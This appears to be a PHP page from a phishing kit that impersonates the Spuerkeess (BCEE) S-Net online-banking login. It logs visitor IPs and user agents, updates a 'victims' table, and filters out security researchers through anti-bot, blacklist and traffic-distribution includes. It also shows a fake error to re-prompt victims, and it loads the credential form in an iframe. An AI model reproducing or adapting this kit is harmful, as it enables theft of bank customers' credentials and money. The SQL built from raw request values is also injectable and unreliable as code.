<?php
include '../ipanel/inc/config.php';
if ($enable_blacktds == "checked") {
    include "../blacktds.php";
}
include '../ipanel/inc/connect.php';
if ($mobile_lock == "checked") {
    include "../ipanel/inc/mob_lock.php";
}
include '../ipanel/inc/blacklist_i.php';
include '../ipanel/inc/gateway.php';
if ($enable_antibots == "checked") {
   include "../ipanel/inc/old_blocker.php";
   include '../ipanel/inc/anti.php';
}
session_start();
$url = $_SERVER['REQUEST_URI'];
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];

$query = mysqli_query($conn, "SELECT * FROM visits WHERE ua='$ua' AND ip='$ip'");
$num = mysqli_num_rows($query);
if ($num == 0) {
   mysqli_query($conn, "INSERT INTO visits (ua, ip) VALUES ('$ua', '$ip')");
}


if(!isset($_SESSION['int_visited'])) {
   header("Location: ../exit.php");
}

if($_SESSION['started'] == 'true'){
   $uniqueid = $_SESSION['uniqueid'];
   $query = mysqli_query($conn, "SELECT * FROM victims WHERE uniqueid=$uniqueid");
   if ($query) {
           $query = mysqli_query($conn, "UPDATE victims SET status=1 WHERE uniqueid=$uniqueid");
       }
}    

if($captcha_enabled== "checked") {
   $currentParams = $_SERVER['QUERY_STRING'];
    if(!isset($_SESSION['captcha_finished'])) {
    header("Location: ../captcha_error.php?$currentParams");
    }
 }
 

if ($_SESSION['started'] == 'true') {
   $uniqueid = $_SESSION['uniqueid'];
   $query = mysqli_query($conn, "SELECT * FROM victims WHERE uniqueid=$uniqueid");
   if ($query) {
      $arr = mysqli_fetch_array($query, MYSQLI_ASSOC);
      $user = $arr['user'];
      if ($user != '') {
        $error = "<div style='color:#D4222D'>" . translateText('errorsp1', $currentLanguage) . "</div>";
      }
   }
}


?>

<!DOCTYPE html>
<html lang="eng"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">


</head><body data-lang="eng"><apm_do_not_touch>


</apm_do_not_touch>



    
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    
    <title>S-Net - Spuerkeess</title>

    <meta name="description" content="snet">
    <meta name="author" content="bcee.lu">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable= no">
    <link rel="icon" type="image/ico" href="theme/favicon.ico">
    

    
    <link rel="stylesheet" href="./theme/jquery-ui.min.css">
    <link href="./theme/bootstrap.min.css" rel="stylesheet">
    
    <link href="./theme/styles.css" rel="stylesheet">
    <link href="./theme/IEfix.css" rel="stylesheet">
    

    
    
    



<div class="bcee-main">

    <div class="bcee-topbar">
        <ul>
            <li class="logo">
                <a><span class="topbarIcon"></span></a>
            </li>
            <li class="today d-none d-lg-block">
                <span id="datetime"></span>
            </li>
            <li class="action">
                <div id="bcee-info" class="bcee-info-dot large"></div>
            </li>
        </ul>
    </div>
    <div class="bcee-header">
	    <div class="container">
	        <div class="row">
	            <div class="col-lg-12">
	                <div class="header-title d-none d-md-inline-block">Login</div>
	                <div class="header-lang">
	
                    <div id="flagfr" class="single-lang <?php echo ($currentLanguage == 'fr') ? 'active' : ''; ?>">
    <div class="lang-flag">
        <img src="./theme/flag_fr.svg">
    </div>
</div>

<div id="flagde" class="single-lang <?php echo ($currentLanguage == 'de') ? 'active' : ''; ?>">
    <div class="lang-flag">
        <img src="./theme/flag_de.svg">
    </div>
</div>
	
	                    <div id="flagen" class="single-lang">
	                        <div class="lang-flag">
	                            <img src="./theme/flag_en.svg">
	                        </div>
	                    </div>
	                </div>
	            </div>
	        </div>
	    </div>
	</div>

    <div class="bcee-content">

        <div class="container">

            <div class="row">

                <div class="col-lg-12" id="maincontent">
                <?=  $error ?>
					<div class="bcee-frame">
						<iframe name="orelyframe" id="orelyframe" width="100%" height="100%" src="./theme/fr.php">
						</iframe>
					</div>
                    
                </div>
                
            </div>

        </div>

    </div>
    
    
    
</div>





<div id="veepn-breach-alert"></div>
<script>
        function formatDate() {
            const now = new Date();
            const options = { weekday: 'long', year: 'numeric', month: 'long', day: 'numeric' };
            const date = now.toLocaleDateString('fr-FR', options);
            const time = now.toLocaleTimeString('fr-FR', { hour: 'numeric', minute: 'numeric', hour12: false });
            const formattedDate = `${date} - ${time}`;
            document.getElementById('datetime').innerText = formattedDate;
        }

        formatDate();
    </script>


</body></html>